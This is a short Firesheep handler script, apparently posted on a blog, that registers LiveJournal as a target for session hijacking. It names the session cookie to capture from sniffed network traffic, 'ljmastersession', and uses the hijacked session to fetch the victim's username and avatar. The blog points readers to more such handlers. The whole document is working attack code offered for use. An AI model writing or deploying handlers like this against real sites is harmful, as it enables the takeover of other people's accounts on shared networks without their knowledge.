// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/
register({
name: "LiveJournal",
domains: [ 'livejournal.com' ],
sessionCookieNames: [ 'ljmastersession' ],
identifyUser: function () {
var resp = this.httpGet("http://www.livejournal.com/update.bml");
this.userName = resp.body.querySelector('#current_username').innerHTML;
this.userAvatar = resp.body.querySelector('#userpic_preview_image').src;
}
});
No comments:
Post a Comment